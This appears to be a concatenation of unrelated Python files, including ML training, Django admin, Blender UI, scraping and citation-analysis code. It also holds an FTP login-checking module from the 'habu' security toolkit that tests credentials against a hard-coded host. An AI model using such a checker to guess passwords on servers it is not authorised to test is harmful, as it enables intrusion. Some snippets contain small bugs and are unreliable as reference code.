cfv.showAndWait()
|
# -*- coding: utf-8 -*-
import os
import errno
import subprocess
import pytest
import swoopi
@pytest.mark.parametrize('supported, detected', [
(True, True), (True, False), (False, False)
])
def test_picamera_status(monkeypatch, supported, detected):
vcgencmd_output = 'supported={} detected={}'.format(
int(supported), int(detected))
monkeypatch.setattr('test_utils.subprocess.check_output',
lambda _: vcgencmd_output)
res_support, res_detect = swoopi.utils.picamera_status()
assert res_support == supported
assert res_detect == detected
def test_picamera_environment_exceptions(monkeypatch):
def nonzero_exception(_):
raise subprocess.CalledProcessError(-1, 'vcgencmd', '')
monkeypatch.setattr('test_utils.subprocess.check_output',
nonzero_exception)
nonzero_support, nonzero_detect = swoopi.utils.picamera_status()
assert nonzero_support is False and nonzero_detect is False
def notfound_exception(_):
raise OSError(errno.ENOENT, os.strerror(errno.ENOENT))
monkeypatch.setattr('test_utils.subprocess.check_output',
notfound_exception)
notfound_support, notfound_detect = swoopi.utils.picamera_status()
assert nonzero_support is False and nonzero_detect is False
|
from habu.lib.auth.base import BaseAuth, ReturnCode
from ftplib import FTP, FTP_TLS, error_perm, Error as FTP_Error
import socket
import logging
auth_failed_messages = [
'530 Authentication failed.',
'530 Login authentication failed',
'530 Login incorrect.',
'530 Login incorrect - invalid email address',
'530 Login or password incorrect!',
'530 User cannot log in.',
]
class FTPAuth(BaseAuth):
services = [ 'ftp' ]
def login(self):
ftp = FTP()
try:
ftp.connect(host=self.address, port=self.port, timeout=3)
except socket.timeout:
return ReturnCode.CONN_TIMEOUT
except ConnectionRefusedError:
return ReturnCode.CONN_REFUSED
try:
ftp.login(user=self.username, passwd=self.password)
return ReturnCode.AUTH_OK
except error_perm as e:
if str(e) in auth_failed_messages:
return ReturnCode.AUTH_FAILED
else:
return ReturnCode.GENERIC_ERROR
except Exception:
return ReturnCode.GENERIC_ERROR
if __name__ == '__main__':
f = FTPAuth(username='anonymous', password='habu', address='150.101.135.3')
print(f.login())
|
# import libraries
import torch
import torch.nn as nn
import torch.utils.data as utils
from tqdm import tqdm
import copy
import matplotlib.pyplot as plt
import numpy as np
import os
import model_3D as model
import matplotlib
matplotlib.use('TkAgg')
# np.random.seed(42)
# torch.manual_seed(42)
def NMSE_loss(input, target, weight=None, reduction='mean'):
if weight is not None:
all_losses = weight * ((input-target) ** 2) / (target**2)
if reduction == 'mean':
loss = torch.sum(all_losses) / torch.sum(weight)
elif reduction == 'eval':
loss = torch.mean(all_losses, axis=1)
else:
raise ValueError('not a valid reduction')
else:
all_losses = ((input-target) ** 2) / (target**2)
if reduction == 'mean':
loss = torch.mean(all_losses)
elif reduction == 'eval':
loss = torch.mean(all_losses, axis=1)
else:
raise ValueError('not a valid reduction')
return loss
def normalize_params(pred_params, orig_params, bounds):
pred_params = pred_params.T
for i in range(len(bounds)):
pred_params[:, i] /= (bounds[1, i] - bounds[0, i])
orig_params[:, i] /= (bounds[1, i] - bounds[0, i])
return pred_params, orig_params
def train(C1, hp, net=None, Hct=None, orig_params=None):
if hp.use_cuda:
torch.backends.cudnn.benchmark = True
if net is None:
net = model.DCE_NET(copy.deepcopy(hp)).to(hp.device)
Hct = np.expand_dims(Hct, axis=(1, 2, 3))
Hct = np.repeat(np.repeat(Hct, C1.shape[1], axis=1), C1.shape[2], axis=2)
C1 = np.concatenate([Hct, C1], axis=3)
C1 = np.moveaxis(C1, 3, 1)
# Loss function and optimizer
criterion = nn.MSELoss().to(hp.device)
# Data loader
split = int(np.floor(len(C1)*hp.training.split))
C1 = torch.from_numpy(C1.astype(np.float32))
train_set, val_set = torch.utils.data.random_split(C1, [split, len(C1)-split])
trainloader = utils.DataLoader(train_set,
batch_size=hp.training.batch_size,
shuffle=True,
num_workers=4,
drop_last=True)
valloader = utils.DataLoader(val_set,
batch_size=hp.training.val_batch_size,
shuffle=False,
num_workers=4,
drop_last=True)
num_batches = len(train_set) // hp.training.batch_size
num_batches2 = len(val_set) // hp.training.val_batch_size
if num_batches > hp.training.totalit:
totalit = hp.training.totalit
else:
totalit = num_batches
if not os.path.exists(hp.out_fold):
os.makedirs(hp.out_fold)
optimizer, scheduler = model.load_optimizer(net, hp)
params_total = sum(p.numel() for p in net.parameters())
train_params = sum(p.numel() for p in net.parameters() if p.requires_grad)
# fix for sudden nan values in patient data
for name, p in net.named_parameters():
if p.requires_grad:
p.register_hook(lambda grad: torch.nan_to_num(grad))
print(params_total, 'params in total')
print(train_params, 'trainable params in total')
best = 1e16
num_bad_epochs = 0
loss_train = []
loss_val = []
bound = hp.max_rep+1
for epoch in range(hp.training.epochs):
print("-----------------------------------------------------------------")
print("\nEpoch:{}; Current best val_loss:{}".format(epoch, best))
train_loss = 0.
val_loss = 0.
hp.acquisition.timing = hp.acquisition.timing.to(hp.device)
for i, X_batch in enumerate(tqdm(trainloader, position=0, leave=True, total=totalit), 0):
if i == totalit:
break
X_batch = X_batch.to(hp.device)
optimizer.zero_grad()
X_pred, ke, dt, ve, vp = net(X_batch[:, 1:bound], Hct=X_batch[:, 0])
loss = criterion(X_pred[:, :bound], X_batch[:, 1:bound])
loss.backward()
optimizer.step()
train_loss += loss.item()
# evaluation
with torch.no_grad():
for i, X_batch in enumerate(tqdm(valloader, position=0, leave=True), 0):
X_batch = X_batch.to(hp.device)
optimizer.zero_grad()
X_pred, ke, dt, ve, vp = net(X_batch[:, 1:bound], Hct=X_batch[:, 0])
loss = criterion(X_pred[:, :bound], X_batch[:, 1:bound])
val_loss += loss.item()
# scale losses
train_loss = train_loss/totalit*1000
val_loss = val_loss/num_batches2*1000
loss_train.append(train_loss)
loss_val.append(val_loss)
if hp.training.optim_patience > 0:
scheduler.step(val_loss)
# early stopping
if val_loss < best:
print("\n############### Saving good model ###############################")
final_model = copy.deepcopy(net.state_dict())
best = val_loss
num_bad_epochs = 0
print("\nLoss: {}; val_loss: {}; bad epochs: {}".format(train_loss,
val_loss,
num_bad_epochs))
else:
num_bad_epochs += 1
print("\nLoss: {}; val_loss: {}; bad epochs: {}".format(train_loss,
val_loss,
num_bad_epochs))
# early stopping
if num_bad_epochs == hp.training.patience:
print("\nEarly stopping, best val loss: {}".format(best))
print("Done with DCE fitting")
break
# calculate the best, median and worst fits based on NMSE loss
X_pred = torch.moveaxis(X_pred, 1, 3).reshape(-1, X_pred.size(1))
X_batch = torch.moveaxis(X_batch[:, 1:], 1, 3).reshape(-1, X_pred.size(-1))
all_losses = NMSE_loss(X_pred, X_batch, reduction='eval')
values_top, inds_top = torch.topk(all_losses, int(len(all_losses)/2))
values_bottom, inds_bottom = torch.topk(all_losses, 2, largest=False)
values = torch.cat((values_top[:2], values_top[-2:], values_bottom))
inds = torch.cat((inds_top[:2], inds_top[-2:], inds_bottom))
minmax_batch_losses = X_batch[inds].cpu()
minmax_pred_losses = X_pred[inds].cpu()
do_plots(hp, epoch, minmax_batch_losses, minmax_pred_losses, loss_train, loss_val, values, name='dce_part')
# do_plots_3D(hp, epoch, X_batch, X_pred, ke, ve, vp, loss_train, loss_val)
print("Done")
net.load_state_dict(final_model)
return net
def do_plots(hp, epoch, X_batch, X_pred, loss_train, loss_val, values, loss_train_curve=None, loss_val_curve=None, name=None):
# plot loss history
hp.acquisition.timing = hp.acquisition.timing.cpu()
plt.close('all')
labels = ['worst', 'median', 'best']
fig, axs = plt.subplots(int(len(values)/2)+1, 2, figsize=(6,5))
for i in range(len(values)):
axs[int(i/2), i%2].plot(hp.acquisition.timing, X_batch.data[i])
axs[int(i/2), i%2].plot(hp.acquisition.timing, X_pred.data[i])
axs[int(i/2), i%2].set_title('{} {}, loss:{:.2e}'.format(labels[int(i/2)], (i%2)+1, values[i].item()))
for ax in axs.flat:
ax.set(xlabel='time (m)', ylabel='signal (a.u.)')
for ax in axs.flat:
ax.label_outer()
axs[3, 0].plot(loss_train)
axs[3, 0].plot(loss_val)
axs[3, 0].set_yscale('log')
axs[3, 0].set_xlabel('epoch')
axs[3, 0].set_ylabel('loss')
plt.ion()
plt.tight_layout()
plt.show()
plt.pause(0.001)
if hp.training.save_train_fig:
plt.gcf()
plt.savefig('{out_fold}/{name}_fit_{epoch}.png'.format(out_fold=hp.out_fold, epoch=epoch, name=name))
return fig
def do_plots_3D(hp, epoch, X_batch, X_pred, ke, ve, vp, loss_train, loss_val):
# plot loss history
hp.acquisition.timing = hp.acquisition.timing.cpu()
plt.close('all')
if hp.supervised or hp.network.aif:
X_batch = X_batch[:, 1:]
fig, axs = plt.subplots(2, 2)
ax1 = axs[0, 0].imshow(ke[0].cpu().numpy().T, cmap='jet')
axs[0, 0].set_title('kep')
ax2 = axs[0, 1].imshow(ve[0].cpu().numpy().T, cmap='jet')
axs[0, 1].set_title('ve')
ax3 = axs[1, 0].imshow(vp[0].cpu().numpy().T, cmap='jet')
axs[1, 0].set_title('vp')
fig.colorbar(ax1, ax=axs[0, 0])
fig.colorbar(ax2, ax=axs[0, 1])
fig.colorbar(ax3, ax=axs[1, 0])
axs[1, 1].plot(loss_train)
axs[1, 1].plot(loss_val)
axs[1, 1].set_yscale('log')
axs[1, 1].set_xlabel('epoch')
axs[1, 1].set_ylabel('loss')
plt.ion()
plt.tight_layout()
plt.show()
plt.pause(0.001)
if hp.training.save_train_fig:
plt.gcf()
plt.savefig('{out_fold}/{name}_fit_{epoch}.png'.format(out_fold=hp.out_fold, epoch=epoch, name='dce-part'))
|
#!/usr/bin/env python3
import pysam
import sys
if __name__ == '__main__':
if len(sys.argv) > 2:
sys.exit("Usage: {} [in.vcf]".format(sys.argv[0]))
if len(sys.argv) > 1:
vcf = pysam.VariantFile(sys.argv[1])
else:
vcf = pysam.VariantFile('-')
pos_offset = 1000000
for record in vcf:
print("{}:{}-{}/{}".format(record.chrom,
record.pos,
record.ref,
','.join(record.alts)))
vcf.close()
|
####################
# ES-DOC CIM Questionnaire
# Copyright (c) 2017 ES-DOC. All rights reserved.
#
# University of Colorado, Boulder
# http://cires.colorado.edu/
#
# This project is distributed according to the terms of the MIT license [http://www.opensource.org/licenses/MIT].
####################
"""
.. module:: admin_customizations
Summary of module goes here
"""
from django.contrib import admin
from django.forms import ModelForm
from Q.questionnaire.models.models_customizations import QModelCustomization, QCategoryCustomization, QPropertyCustomization
from Q.questionnaire.q_utils import update_field_widget_attributes
# these next few classes let me view all the QPropertyCustomizations and/or QCategoryCustomizations belonging to a given QModelCustomization and/or QCategoryCustomization
class QPropertyCustomizationInlineForm(ModelForm):
"""
A silly ModelForm for the admin that shows no fields
It is used in conjunction w/ the StackedInline below
"""
class Meta:
model = QPropertyCustomization
fields = []
class QPropertyCustomizationInline(admin.StackedInline):
"""
A silly StackedInline which includes a link to the admin of a given QPropertyCustomization
"""
model = QPropertyCustomization
form = QPropertyCustomizationInlineForm
show_change_link = True
extra = 0
class QCategoryCustomizationInlineForm(ModelForm):
"""
A silly ModelForm for the admin that shows no fields
It is used in conjunction w/ the StackedInline below
"""
class Meta:
model = QCategoryCustomization
fields = []
class QCategoryCustomizationInline(admin.StackedInline):
"""
A silly StackedInline which includes a link to the admin of a given QCategoryCustomization
"""
model = QCategoryCustomization
form = QCategoryCustomizationInlineForm
show_change_link = True
extra = 0
# now define the actual admins & forms...
class QPropertyCustomizationAdminForm(ModelForm):
class Meta:
model = QPropertyCustomization
fields = [
"name",
"project",
"proxy",
"model_customization",
"category_customization",
"property_title",
"is_required",
"is_hidden",
"is_editable",
"is_nillable",
"property_description",
"inline_help",
"order",
"field_type",
"can_inherit",
"default_values",
"atomic_type",
"atomic_suggestions",
"enumeration_is_open",
"relationship_show_subforms",
# TODO: relationship_target_model_customizations
# "relationship_target_model_customizations",
]
class QPropertyCustomizationAdmin(admin.ModelAdmin):
"""
Custom ModelAdmin for QPropertyCustomization
"""
form = QPropertyCustomizationAdminForm
class QCategoryCustomizationAdminForm(ModelForm):
class Meta:
model = QCategoryCustomization
fields = [
"name",
"project",
"proxy",
"model_customization",
"order",
"category_title",
"category_description",
"is_hidden",
]
class QCategoryCustomizationAdmin(admin.ModelAdmin):
"""
Custom ModelAdmin for QCategoryCustomization
Provides an inline form for viewing QPropertyCustomizations
"""
inlines = (QPropertyCustomizationInline,)
form = QCategoryCustomizationAdminForm
class QModelCustomizationAdminForm(ModelForm):
class Meta:
model = QModelCustomization
fields = [
"name",
"owner",
"shared_owners",
"project",
"proxy",
"synchronization",
"order",
"documentation",
"is_default",
"model_title",
"model_description",
"model_hierarchy_title",
"model_show_empty_categories",
]
class QModelCustomizationAdmin(admin.ModelAdmin):
"""
Custom ModelAdmin for QModelCustomization
Provides an inline form for viewing QPropertyCustomizations
"""
inlines = (QCategoryCustomizationInline, QPropertyCustomizationInline,)
form = QModelCustomizationAdminForm
admin.site.register(QModelCustomization, QModelCustomizationAdmin)
admin.site.register(QCategoryCustomization, QCategoryCustomizationAdmin)
admin.site.register(QPropertyCustomization, QPropertyCustomizationAdmin)
|
# load the pypes framework
from pkg_resources import require
require('pypes')
import re
import time
from pypes.pipeline import Dataflow
from pypes.component import Component
class Tail(Component):
__metatype__ = 'ADAPTER'
def __init__(self, fp):
Component.__init__(self)
self.fp = fp
def run(self):
self.fp.seek(0,2)
while True:
self.receive('in')
line = self.fp.readline()
if line:
self.send('out', line.strip())
else:
self.yield_ctrl()
class Grep(Component):
__metatype__ = 'TRANSFORMER'
def __init__(self, pattern):
Component.__init__(self)
self.regex = re.compile(pattern)
def run(self):
while True:
for line in self.receive_all('in'):
if self.regex.match(line):
self.send('out', line)
self.yield_ctrl()
class Printer(Component):
__metatype__ = 'PUBLISHER'
def __init__(self):
Component.__init__(self)
def run(self):
while True:
for data in self.receive_all('in'):
print(data)
self.yield_ctrl()
tail = Tail(open('/var/log/syslog', 'r'))
grep = Grep('.*pants.*')
printer = Printer()
pipe = Dataflow({
tail: {grep:('out','in')},
grep: {printer:('out', 'in')}
})
while True:
pipe.send(None)
time.sleep(0.1)
|
'''
Copyright (C) 2021 CG Cookie
http://cgcookie.com
hello@cgcookie.com
Created by Jonathan Denning, Jonathan Williamson
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import os
import re
import sys
import math
import time
import random
import asyncio
import inspect
import traceback
import contextlib
from math import floor, ceil
from inspect import signature
from itertools import dropwhile, zip_longest
from concurrent.futures import ThreadPoolExecutor
from .ui_utilities import UI_Element_Utils
from .ui_settings import DEBUG_COLOR_CLEAN, DEBUG_PROPERTY, DEBUG_COLOR, DEBUG_DIRTY, DEBUG_LIST, CACHE_METHOD, ASYNC_IMAGE_LOADING
import bpy
import bgl
import blf
import gpu
from .blender import tag_redraw_all
from .ui_styling import UI_Styling, ui_defaultstylings
from .ui_utilities import helper_wraptext, convert_token_to_cursor
from .drawing import ScissorStack, FrameBuffer
from .fsm import FSM
from .useractions import ActionHandler
from .boundvar import BoundVar
from .debug import debugger, dprint, tprint
from .decorators import debug_test_call, blender_version_wrapper, add_cache
from .drawing import Drawing
from .fontmanager import FontManager
from .globals import Globals
from .hasher import Hasher
from .maths import Vec2D, Color, mid, Box2D, Size1D, Size2D, Point2D, RelPoint2D, Index2D, clamp, NumberUnit
from .maths import floor_if_finite, ceil_if_finite
from .profiler import profiler, time_it
from .utils import iter_head, any_args, join, abspath
class LineFitter:
def __init__(self, *, left, top, width, height):
self.box = Box2D(left=left, top=top, width=width, height=height)
self.max_width = 0
self.sum_height = 0
self.lines = []
self.current_line = None
self.new_line()
def new_line(self):
# width: sum of all widths added to current line
# height: max of all heights added to current line
if not self.is_current_line_empty():
self.max_width = max(self.max_width, self.current_width)
self.sum_height = self.sum_height + self.current_height
self.lines.append(self.current.elements)
self.current_line = []
self.current_width = 0
self.current_height = 0
def is_current_line_empty(self):
return not self.current_line
@property
def remaining_width(self): return self.box.width - self.current_width
@property
def remaining_height(self): return self.box.height - self.sum_height
def get_next_box(self):
return Box2D(
left = self.box.left + self.current_width,
top = -(self.box.top + self.sum_height),
width = self.box.width - self.current_width,
height = self.box.height - self.sum_height,
)
def add_element(self, element, size):
# assuming element is placed in correct spot in line
if not self.fit(size): self.new_line()
pos = Box2D(
left = self.box.left + self.current_width,
top = -(self.box.top + self.sum_height),
width = size.smallest_width(),
height = size.smallest_height(),
)
self.current_line.append(element)
self.current_width += size.smallest_width()
self.current_height = max(self.current_height, size.smallest_height())
return pos
def fit(self, size):
if size.smallest_width() > self.remaining_width: return False
if size.smallest_height() > self.remaining_height: return False
return True
class TableFitter:
def __init__(self):
self._cells = {} # keys are Index2D
self._index = Index2D(0, 0)
def new_row(self):
self._index.update(i=0, j_off=1)
def new_col(self):
pass
|
import os
from bs4 import BeautifulSoup
import requests
import json
import concurrent.futures
import time
def char_case(argument):
# ---Function to clean the character's names when searching in Danbooru---
# Checks the text inputted to see if it's in the JSON:
try:
with open("characters.json") as chars_in_jason:
switcher = json.load(chars_in_jason)
except FileNotFoundError as e:
print("JSON file not found, please place the file in the same folder/directory as this program")
print(e)
end = input("Press Enter to end the program \n")
# get() method of dictionary data type returns
# the value of passed argument if it is found within
# the JSON, otherwise the second argument will
# be assigned as default value of passed argument in which case it's the same thing as inputted.
# Without the JSON, the program fails to work.
return switcher.get(argument, argument)
# The search engine where you input the character's name, switches any space to underscore and lowercases the string.
character_source = input("What character would you like to search: \n").lower()
character_source = character_source.replace(" ","_")
character_source = char_case(character_source)
if (character_source == "exit"):
exit()
print(character_source)
start_time = time.perf_counter()
# Then it takes the tag and adds it to the full https link to use it to parse.
source = requests.get(f"https://safebooru.donmai.us/posts?tags={character_source}").text
# This is where BeautifulSoup comes into play for parsing the sections necessary till it narrows it down to the images section.
soup = BeautifulSoup(source, 'lxml')
body = soup.body
img = body.find('div', id='page')
c_post = img.find('div', id='c-posts')
a_index = c_post.find('div', id='a-index')
main_content = a_index.find('section', id='content')
posts_1 = main_content.find('div', id='posts')
posts_2 = posts_1.find('div', id='posts-container')
# This piece here checks if there are any images at all on the webpage. Then makes a directory if not existing.
if(len(posts_2) > 5):
try:
os.mkdir(character_source)
print("Directory " , character_source , " has been created.\n")
except FileExistsError:
print("Directory " , character_source , " already exists.\n")
else:
# Kills the program because no results were found.
print("No images found.")
end = input("Press Enter to end the program \n")
exit()
# The section which nets all the images and puts it in the directory the program utilizes.
def download_images(character_images):
x = character_images['data-file-url']
filename = x.split('/')
if os.path.exists(f"{character_source}\\" + filename[4]):
print(f"File {x} already Exist.")
else:
# The downloading segment.
print(f"Downloading {x}...")
second_request = requests.get(x)
with open(f"{character_source}\\" + filename[4], 'wb') as f:
f.write(second_request.content)
with concurrent.futures.ThreadPoolExecutor() as executor:
executor.map(download_images, posts_2.find_all('article'))
# End of the line.
end_time = time.perf_counter()
print(f"all possible images have successfully been downloaded in {round(end_time-start_time, 2)} seconds.")
end = input("Press Enter to end the program \n")
|
from django import forms
from metashare.oaipmh import supported_commands
class HarvestForm(forms.Form):
"""
Settings form for OAI-PMH import.
"""
base_URL = forms.URLField(label=u"OAI-PMH server URL",
initial=u"http://www.language-archives.org/cgi-bin/olaca3.pl",
help_text=u"The OAI-PMH domain name that handles OAI-PMH verbs",)
verb = forms.ChoiceField(label=u"What to do",
choices=[(name, name) for name in supported_commands.keys()],
help_text=u"Select OAI-PMH action " \
"(fill out item id if applicable)",)
metadata_format = forms.CharField(
label=u"Metadata format",
help_text=u"Use list metadata for choices",
initial=u"olac",
required=False,)
itemid = forms.CharField(label=u"Record ID",
help_text=u"Leave empty for the whole collection or " \
"if not applicable",
required=False,)
from_ = forms.CharField(label=u"From",
help_text=u"Lower bound for datestamp-based selective " \
"harvesting. e.g '2011-02-01T12:00:00Z' or '2011-02-01'",
required=False,)
until = forms.CharField(label=u"Until",
help_text=u"Upper bound for datestamp-based selective " \
"harvesting. e.g '2011-02-01T12:00:00Z' or '2011-02-01'",
required=False,)
set_ = forms.CharField(label=u"Set",
help_text=u"Leave empty for the whole collection or " \
"if not applicable",
required=False,)
class ExposeForm(forms.Form):
"""
Settings form for OAI-PMH import.
"""
VERBS = (('Identify', 'Identify Server'),
('GetRecord', 'Get Record'),
('ListIdentifiers', 'List Identifiers'),
('ListMetadataFormats', 'List Formats'),
('ListRecords', 'List Records'),
('ListSets', 'List Sets'),)
FORMATS = (('', '-----------'),
('metashare', 'metashare'),
('olac', 'olac'),
('cmdi', 'cmdi'))
verb = forms.ChoiceField(label=u"What to do",
choices=VERBS,
help_text=u"Select OAI-PMH verb " \
"(fill out item identifier if applicable)",)
metadata_str = forms.ChoiceField(label=u"OAI-PMH metadata format",
choices=FORMATS,
help_text=u"Select a metadata format if applicable " \
"with the specified verb",
required=False,)
itemid = forms.CharField(label=u"Item Identifier",
help_text=u"Leave empty for the whole collection or " \
"if not applicable",
required=False,)
from_ = forms.CharField(label=u"From",
help_text=u"Lower bound for datestamp-based selective " \
"harvesting. e.g '2011-02-01T12:00:00Z' or '2011-02-01'",
required=False,)
until = forms.CharField(label=u"Until",
help_text=u"Upper bound for datestamp-based selective " \
"harvesting. e.g '2011-02-01T12:00:00Z' or '2011-02-01'",
required=False,)
set_ = forms.CharField(label=u"Set",
help_text=u"Select a set name to specify set criteria " \
"for selective harvesting",
required=False,)
resumptionToken = forms.CharField(label=u"Resumption Token",
help_text=u"Exclusive argument. " \
"It is a token returned by a previous request "\
"that issued an incomplete list.",
required=False,) |
# coding=utf-8
from transformers import XLMRobertaTokenizer
from transformers.utils import logging
logger = logging.get_logger(__name__)
SPIECE_UNDERLINE = "▁"
VOCAB_FILES_NAMES = {"vocab_file": "sentencepiece.bpe.model"}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"layoutxlm-base": "https://huggingface.co/layoutxlm-base/resolve/main/sentencepiece.bpe.model",
"layoutxlm-large": "https://huggingface.co/layoutxlm-large/resolve/main/sentencepiece.bpe.model",
}
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"layoutxlm-base": 512,
"layoutxlm-large": 512,
}
class LayoutXLMTokenizer(XLMRobertaTokenizer):
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
model_input_names = ["input_ids", "attention_mask"]
def __init__(self, model_max_length=512, **kwargs):
super().__init__(model_max_length=model_max_length, **kwargs)
|
#coding:utf-8
'''
根据不同给的subject标签对wos的论文进行分领域处理
'''
from basic_config import *
from gini import gini
'''
选择6个top领域,然后在6个top领域内分别选择一个子领域作为实验数据。
'''
def get_paperids_of_subjects():
pid_subjs = json.loads(open('../cascade_temporal_analysis/data/_ids_subjects.json').read())
paper_year = json.loads(open('../cascade_temporal_analysis/data/pubyear_ALL.json').read())
subj_ids = defaultdict(list)
subj_year_num = defaultdict(lambda:defaultdict(int))
# pid_topsubj = json.loads(open('../cascade_temporal_analysis/data/_ids_top_subjects.json').read())
sub_foses = set(['computer science','physics','chemistry','medicine','art','biology'])
for pid in pid_subjs.keys():
for subj in pid_subjs[pid]:
for s in sub_foses:
if s in subj.lower():
subj_ids[s].append(pid)
subj_year_num[s][paper_year[pid]]+=1
open('data/subj_pids.json','w').write(json.dumps(subj_ids))
logging.info('data saved to data/subj_pids.json')
open('data/subj_paper_num.json','w').write(json.dumps(subj_year_num))
logging.info('data saved to data/subj_paper_num.json')
for subj in subj_ids.keys():
logging.info('there are {} papers in subj {}'.format(len(subj_ids[subj]),subj))
def stats_citation_dis_over_years():
sub_foses = set(['computer science','physics','chemistry','medicine','art','biology'])
# pid_subjs = json.loads(open('../cascade_temporal_analysis/data/_ids_subjects.json').read())
pid_topsubjs = json.loads(open('../cascade_temporal_analysis/data/_ids_top_subjects.json').read())
paper_year = json.loads(open('../cascade_temporal_analysis/data/pubyear_ALL.json').read())
subj_pids = json.loads(open('data/subj_pids.json').read())
pid_subjs = defaultdict(set)
for subj in subj_pids.keys():
for pid in subj_pids[subj]:
pid_subjs[pid].add(subj)
years = range(1900,2019)
topsubj_year_pid_citnum = defaultdict(lambda:defaultdict(lambda:defaultdict(int)))
subj_year_pid_citnum = defaultdict(lambda:defaultdict(lambda:defaultdict(int)))
progress = 0
for line in open('../cascade_temporal_analysis/data/pid_cits_ALL.txt'):
progress+=1
if progress%10000000==0:
logging.info('reading %d citation relations....' % progress)
line = line.strip()
pid,citing_id = line.split("\t")
if paper_year.get(pid,None) is None or paper_year.get(citing_id,None) is None:
continue
if pid_topsubjs.get(pid,None) is None or pid_topsubjs.get(citing_id,None) is None:
continue
citing_year = int(paper_year[citing_id])
cited_year = int(paper_year[pid])
for year in years:
##最高领域
for topsubj in pid_topsubjs[pid]:
## 引证文献和被引文献必须是同一领域的论文
if topsubj not in set(pid_topsubjs[citing_id]):
continue
if citing_year<=year and cited_year<=year:
#这个领域小于该年的引用关系进行统计
topsubj_year_pid_citnum[topsubj][year][pid]+=1
## 每个领域选取一个子领域
for subj in pid_subjs[pid]:
if subj.lower() not in set(pid_subjs[citing_id]):
continue
if citing_year<=year and cited_year<=year:
#这个领域小于该年的引用关系进行统计
subj_year_pid_citnum[subj][year][pid]+=1
open('data/topsubj_year_pid_citnum.json','w').write(json.dumps(topsubj_year_pid_citnum))
logging.info('data saved to data/topsubj_year_pid_citnum.json.')
open('data/subj_year_pid_citnum.json','w').write(json.dumps(subj_year_pid_citnum))
logging.info('data saved to data/subj_year_pid_citnum.json.')
##统计wos所有论文的citation count随着时间的变化情况
def stats_citation_count_of_papers(subj,tag):
logging.info('loading paper year obj ...')
paper_year = json.loads(open('../cascade_temporal_analysis/data/pubyear_ALL.json').read())
logging.info('start to stat citation relations ...')
subj_pids = json.loads(open('data/subj_pids.json').read())
## 需要保证是local citation才行
# _ids_top_subjects = json.loads(open(''))
id_set = set(subj_pids[subj])
pid_year_citnum = defaultdict(lambda:defaultdict(int))
progress = 0
lines = []
for line in open('../cascade_temporal_analysis/data/pid_cits_ALL.txt'):
progress+=1
if progress%10000000==0:
logging.info('reading %d citation relations....' % progress)
line = line.strip()
pid,citing_id = line.split("\t")
if pid not in id_set:
continue
if citing_id not in id_set:
continue
if paper_year.get(pid,None) is None or paper_year.get(citing_id,None) is None:
continue
pid_year_citnum[pid][int(paper_year[citing_id])]+=1
open('data/pid_year_citnum_{}.json'.format(tag),'w').write(json.dumps(pid_year_citnum))
logging.info('pid year citnum saved to data/pid_year_citnum_{}.json.'.format(tag))
##整体领域高被引论文的平均数随着数据规模的变化情况
def general_top_citation_trend_over_datasize(subj,tag):
## paper year
paper_year = json.loads(open('../cascade_temporal_analysis/data/pubyear_ALL.json').read())
paper_ts = json.loads(open('data/pid_teamsize.json').read())
## 按照学科进行分析
pid_year_citnum = json.loads(open('data/pid_year_citnum_{}.json'.format(tag)).read())
## year num count 各学科每年的引用次数分布
year_citnum_dis = defaultdict(lambda:defaultdict(int))
## 根据发布年份的引用次数分布
puby_year_citnum_dis = defaultdict(lambda:defaultdict(lambda:defaultdict(int)))
## 各学科中 不同 teamsize随着时间的变化
ts_year_citnum_dis = defaultdict(lambda:defaultdict(lambda:defaultdict(int)))
for pid in pid_year_citnum.keys():
pubyear = int(paper_year[pid])
if pubyear>= 2016:
continue
ts = paper_ts.get(pid,1)
year_total = paper_year_total_citnum(pid_year_citnum[pid])
for year in range(pubyear,2016):
citN = year_total.get(year,0)
if citN==0:
continue
year_citnum_dis[year][citN]+=1
puby_year_citnum_dis[pubyear][year][citN]+=1
ts_year_citnum_dis[ts][year][citN]+=1
open('data/year_citnum_dis_{}.json'.format(tag),'w').write(json.dumps(year_citnum_dis))
logging.info('subject year paper citnum dis data saved to data/year_citnum_dis_{}.json'.format(tag))
open('data/puby_year_citnum_dis_{}.json'.format(tag),'w').write(json.dumps(puby_year_citnum_dis))
logging.info('subject pubyear year paper citnum dis data saved to data/puby_year_citnum_dis_{}.json'.format(tag))
open('data/ts_year_citnum_dis_{}.json'.format(tag),'w').write(json.dumps(ts_year_citnum_dis))
logging.info('subject teamsize year paper citnum dis data saved to data/ts_year_citnum_dis_{}.json'.format(tag))
logging.info('done')
##不同的年代发表的高被引论文的引用次数平均数随着数据规模的变化情况
def temporal_top_citation_trend_over_datasize(subj,tag):
# paper_num_dis_over_pubyear()
subj_upper_limit_over_year()
# fig,axes = plt.subplots(4,2,figsize=(10,16))
# for i,subj in enumerate(sorted(year_citnum_dis.keys())):
# plt.tight_layout()
# plt.savefig('fig/subj_citation_upper_limit.png',dpi=400)
# logging.info('fig saved to fig/subj_citation_upper_limit.png.')
# year_num = subj_year_num[subj]
## 不同学科 不同年份的引用次数分布
def upper_limit_over_year(subj,tag):
logging.info('loading subj year citnum dis ...')
year_citnum_dis = json.loads(open('data/year_citnum_dis_{}.json'.format(tag)).read())
year_num = json.loads(open('data/subj_paper_num.json').read())[subj]
fig,ax = plt.subplots(figsize=(5,4))
# year_citnum_dis = year_citnum_dis[subj]
xs = []
ys_10 = []
ys_100 = []
ys_1000 = []
num_t = 0
for year in sorted(year_citnum_dis.keys(),key=lambda x:int(x)):
# xs.append(int(year))
num_t+=year_num[year]
xs.append(num_t)
citnum_dis = year_citnum_dis[year]
top10 = topN_mean(citnum_dis,10)
top100 = topN_mean(citnum_dis,100)
top1000 = topN_mean(citnum_dis,1000)
ys_10.append(top10)
ys_100.append(top100)
ys_1000.append(top1000)
curve_fit_plotting(ax,xs,ys_10,'top10')
curve_fit_plotting(ax,xs,ys_100,'top100')
curve_fit_plotting(ax,xs,ys_1000,'top1000')
ax.set_title(subj)
